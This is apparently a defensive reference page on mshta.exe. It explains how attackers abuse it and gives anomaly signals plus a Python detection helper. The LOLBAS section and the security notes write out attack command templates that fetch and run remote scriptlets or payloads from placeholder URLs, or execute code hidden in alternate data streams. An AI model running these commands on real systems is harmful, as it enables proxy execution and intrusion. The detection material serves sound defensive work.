Process

mshta.exe

mshta.exe is the Microsoft HTML Application Host, the program that runs HTA files. An HTA is an HTML page with embedded VBScript or JScript that runs as a standalone desktop application with full local privileges, outside the browser's sandbox. A few legacy enterprise tools still ship as HTAs, but the format now turns up far more in attacks than in normal use.

File identity

File details

Not observed.

Signing information

Not observed.

File version

Not observed.

File size

Not observed.

Execution context

File paths

Not observed.

User context

Not observed.

Integrity level

Not observed.

Instances

Not observed.

Session

Not observed.

Token privileges

Not observed.

Ancestry

Parents

Not observed.

Children

Not observed.

Grandparents

Not observed.

Grandchildren

Not observed.

Behavior

Loaded modules

Not observed.

Named pipes

Not observed.

Process handles

Not observed.

Command-line patterns

Not observed.

LOLBAS (5)
  • mshta.exe {PATH:.hta} [Execute · Execute code]
  • mshta.exe vbscript:Close(Execute("GetObject(""script:{REMOTEURL:.sct}"")")) [Execute · Execute code]
  • mshta.exe javascript:a=GetObject("script:{REMOTEURL:.sct}").Exec();close(); [Execute · Execute code]
  • mshta.exe "{PATH_ABSOLUTE}:file.hta" [ADS · Execute code hidden in alternate data stream]
  • mshta.exe {REMOTEURL} [Download · Downloads payload from remote server]

Indicators

Hashes

Not observed.

Analysis

About this process

mshta.exe runs HTML Applications using the same Trident engine that powered Internet Explorer, but without the browser's security restrictions. Script inside an .hta runs with the privileges of the user, reaches the full file system and COM, and is trusted like any installed application. The genuine binary lives at C:\Windows\System32\mshta.exe, with a 32-bit copy under SysWOW64.

It needs an HTA to run, given either as a local file path or as a URL, and it can also execute inline script passed directly on the command line through the javascript: and vbscript: handlers. When legitimate, its parent is usually explorer.exe (a user double-clicking an HTA) or another application launching an HTA it bundles.

On most modern systems mshta runs rarely. What it executes is determined entirely by the HTA or inline script named on its command line.

Security notes

mshta.exe is a heavily used proxy-execution tool (T1218.005), a staple of phishing chains. The signed binary will run an HTA from a local path or a URL, executing the embedded VBScript or JScript with local trust and nothing dropped to disk (T1059.005, T1059.007). Because the binary is legitimate, path and signature checks pass. The signal is the command line and the parent, classically an Office document spawning mshta http://host/page.hta.

It is also a fileless download stage. The javascript: and vbscript: handlers let mshta run code directly from its command line, and that code routinely fetches and launches the next payload (T1105). A URL, or a javascript:/vbscript: string, in an mshta command line is almost never legitimate.

Anomaly signals (7)
  • Image path other than C:\Windows\System32\mshta.exe or its SysWOW64 copy [high]
  • A URL (http/https) on the command line [high]
  • javascript: or vbscript: inline on the command line [high]
  • Parent is an Office application, wscript.exe, cscript.exe, or another LOLBIN [high]
  • mshta spawning cmd.exe, powershell.exe, or other LOLBINs [high]
  • Loading an .hta from a user-writable path (Temp, AppData, Downloads) [high]
  • Outbound network connections from mshta [med]
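The seven signals above, applied to process-creation events as a triage helper. This is an added example for this page, not the site's own code; the event field names, the Office/LOLBIN name sets and the sample events are constructed assumptions.

```python
"""Evaluate mshta.exe process events against the anomaly signals listed above."""
import re

# Assumed name sets (not from the page): which parents and children count as Office/LOLBIN.
LEGIT_IMAGES = {r"c:\windows\system32\mshta.exe", r"c:\windows\syswow64\mshta.exe"}
OFFICE_OR_LOLBIN_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                            "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}
LOLBIN_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                   "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
USER_WRITABLE = re.compile(r"\\(temp|appdata|downloads)\\", re.I)

def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path (handles forward slashes too)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def mshta_signals(event: dict) -> dict:
    """Return {signal_name: severity} for every anomaly signal that fires on one event."""
    hits = {}
    cmd = event.get("command_line", "")
    if event.get("image", "").lower() not in LEGIT_IMAGES:
        hits["image_path"] = "high"
    if re.search(r"https?://", cmd, re.I):
        hits["url_on_cmdline"] = "high"
    if re.search(r"\b(javascript|vbscript):", cmd, re.I):
        hits["inline_script"] = "high"
    if _basename(event.get("parent_image", "")) in OFFICE_OR_LOLBIN_PARENTS:
        hits["suspicious_parent"] = "high"
    if {_basename(c) for c in event.get("children", [])} & LOLBIN_CHILDREN:
        hits["lolbin_child"] = "high"
    if ".hta" in cmd.lower() and USER_WRITABLE.search(cmd):
        hits["hta_from_user_writable"] = "high"
    if event.get("network_connections"):
        hits["network"] = "med"
    return hits

def verdict(event: dict) -> str:
    """Collapse the fired signals into one triage level: high, med or none."""
    sev = set(mshta_signals(event).values())
    return "high" if "high" in sev else "med" if "med" in sev else "none"

# Constructed sample events, not real telemetry.
BENIGN = {"image": r"C:\Windows\System32\mshta.exe",
          "command_line": r'mshta.exe "C:\Program Files\Vendor\tool.hta"',
          "parent_image": r"C:\Windows\explorer.exe", "children": [], "network_connections": 0}
PHISH = {"image": r"C:\Windows\System32\mshta.exe",
         "command_line": "mshta http://host/page.hta",
         "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
         "children": [r"C:\Windows\System32\cmd.exe"], "network_connections": 1}

if __name__ == "__main__":
    for name, ev in (("benign", BENIGN), ("phish", PHISH)):
        print(name, verdict(ev), sorted(mshta_signals(ev)))
```

Only the legitimate image-path check is a hard rule; the rest are heuristics, so the verdict is a triage level to review rather than a block decision.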

Telemetry

OS prevalence

Not observed.

Observation timeline

Not observed.
